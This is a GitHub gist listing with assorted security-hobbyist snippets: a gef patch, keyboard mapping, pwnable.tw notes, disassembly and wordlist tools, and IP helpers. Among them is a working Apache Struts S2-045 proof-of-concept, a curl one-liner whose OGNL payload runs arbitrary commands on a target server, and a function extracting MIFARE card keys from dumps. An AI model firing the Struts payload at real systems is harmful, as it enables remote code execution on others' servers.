
@OwenChia
OwenChia / gef_att.patch
Last active July 9, 2019 16:05
Permanently Change gef/pwndbg disassembly flavor from intel to att syntax
diff --git a/gef.py b/gef.py
index 13e26eb..2f189eb 100644
--- a/gef.py
+++ b/gef.py
@@ -1160,6 +1160,7 @@ def capstone_disassemble(location, nb_insn, **kwargs):
capstone = sys.modules["capstone"]
arch, mode = get_capstone_arch(arch=kwargs.get("arch", None), mode=kwargs.get("mode", None), endian=kwargs.get("endian", None))
cs = capstone.Cs(arch, mode)
+ cs.syntax = capstone.CS_OPT_SYNTAX_ATT
cs.detail = True
@OwenChia
OwenChia / 70-keyboard.hwdb
Created November 2, 2017 03:52
Keyboard mapping for TerransForce S4
# TerransForce S4 - http://www.terransforce.com/?product_info/S4-1060-67T.html
# Usage:
# put this content in /etc/udev/hwdb.d/70-keyboard.hwdb, and then run
# > systemd-hwdb update
# > udevadm trigger /dev/input/event5
#
evdev:atkbd:dmi:bvn*:bvr*:bd*:svnTerransForce:pnTerransForceS4:pvr*
KEYBOARD_KEY_e4=f21 # Touchpad
KEYBOARD_KEY_f7=brightnessdown # Fn+F4
KEYBOARD_KEY_f8=brightnessup # Fn+F5
@OwenChia
OwenChia / gist:4dc69b7e39a667476df704a2de9af5bf
Last active May 16, 2019 11:14
栈溢出学习笔记 (一)
题目是 pwnable.tw 上的一个, start[0]
使用 hexdump -Cv start 得到如下输出:
00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 03 00 01 00 00 00 60 80 04 08 34 00 00 00 |........`...4...|
00000020 6c 01 00 00 00 00 00 00 34 00 20 00 01 00 28 00 |l.......4. ...(.|
00000030 05 00 02 00 01 00 00 00 00 00 00 00 00 80 04 08 |................|
00000040 00 80 04 08 a3 00 00 00 a3 00 00 00 05 00 00 00 |................|
00000050 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
@OwenChia
OwenChia / disasm_x86.py
Created October 1, 2017 08:29
disasm x86 machine code
import argparse
from capstone import (
Cs,
CS_ARCH_X86,
CS_MODE_32,
CS_OPT_SYNTAX_ATT,
)
@OwenChia
OwenChia / wordlist.hy
Created April 23, 2017 11:28
wordlist generator
#! /usr/bin/env hy
(import argparse)
(import lzma)
;; (import [pathlib [Path]])
(import [string [printable]])
;; 36 for [0-9a-z]
@OwenChia
OwenChia / getip.sed
Last active April 22, 2017 12:58
getip.sed
#! /bin/sed -nf
# Usage:
# ip addr | sed -nf getip.sed | column -t
/^[[:digit:]]/ {
: begin
s/^[[:digit:]]\+: \([[:graph:]]\+\).*/\1/
h
: loop
@OwenChia
OwenChia / getip.sh
Created March 31, 2017 16:32
getip
# getip - list the local addresses reported by `ip addr`.
# Prints the second field (address/prefix) of every line that mentions
# "inet", leaving out lines marked "scope host" (e.g. loopback).
getip ()
{
    ip addr | awk '{ if ($0 ~ /inet/ && $0 !~ /scope host/) print $2 }'
}
@OwenChia
OwenChia / s2-045.sh
Last active March 9, 2017 15:56
poc_s2-045
# Usage:
# source /path/to/s2-045.sh
# poc_s2-045 uri [command]
#
# Proof-of-concept check for the Struts advisory S2-045. It sends a single
# request to `uri` whose Content-Type header holds an OGNL expression rather
# than a media type.
#   $1  target URI (unquoted below, so it is subject to word splitting/globbing)
#   $2  command string placed into the expression; ${2-whoami} falls back to
#       `whoami` when no second argument is given
# As written, the expression clears OgnlUtil's excluded packages and classes,
# runs the command through java.lang.ProcessBuilder (cmd.exe /c when os.name
# contains "win", /bin/bash -c otherwise) and copies the process output into
# the servlet response, so an affected server answers with the command output.
# --insecure makes curl skip TLS certificate verification.
#
# Detection: a request Content-Type that starts with "%{" or contains
# "ognl.OgnlContext", "#_memberAccess" or "java.lang.ProcessBuilder" is not a
# legitimate media type; log Content-Type values at the proxy/WAF and alert on
# these substrings.
# Mitigation: move to a Struts release that the S2-045 advisory lists as fixed,
# and reject requests whose Content-Type does not parse as a media type.
poc_s2-045 () { curl --insecure $1 -H "Content-Type:%{(#enctype='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='${2-whoami}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" }
@OwenChia
OwenChia / exf.sh
Last active March 5, 2017 08:41
extract key from mfd file
#Usage:
# source /path/to/exf.sh
# exf /path/to/m1.mfd
#
#How to remove?
# unset -f exf
#or you can use unfunction in zsh:
# unfunction exf
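# exf FILE - print the key pair held in every fourth 16-byte block of FILE.
#
# xxd emits one 16-byte block per line; only the first 64 lines (1 KiB) are
# considered, and of those only the lines whose offset ends in 30, 70, b0 or
# f0. For each such line, bytes 0-5 and bytes 10-15 are printed as two hex
# strings separated by a space.
# NOTE(review): this matches the sector-trailer layout of a MIFARE Classic 1K
# dump (key A, access bits, key B) - presumably what an .mfd file is; confirm.
#
# The output is key material: keep it out of shared logs and scrollback.
#
# Runs in a subshell, as the original did.
exf () {
    (
        # "$1" is quoted so paths containing spaces or glob characters work.
        # The offset test is bound to field 1 so that "30:"-like text in
        # xxd's ASCII column cannot select a line by accident.
        xxd "$1" | awk 'NR <= 64 && $1 ~ /[37bf]0:$/ {print $2 $3 $4, $7 $8 $9}'
    )
}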
@OwenChia
OwenChia / uniq_replies.py
Last active March 5, 2017 11:03
Get the unique reply list from v2ex.com
# -*- coding: utf-8 -*-
from functools import reduce
from urllib import request
import argparse
import json
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("topic", type=int, nargs='?', default=293899)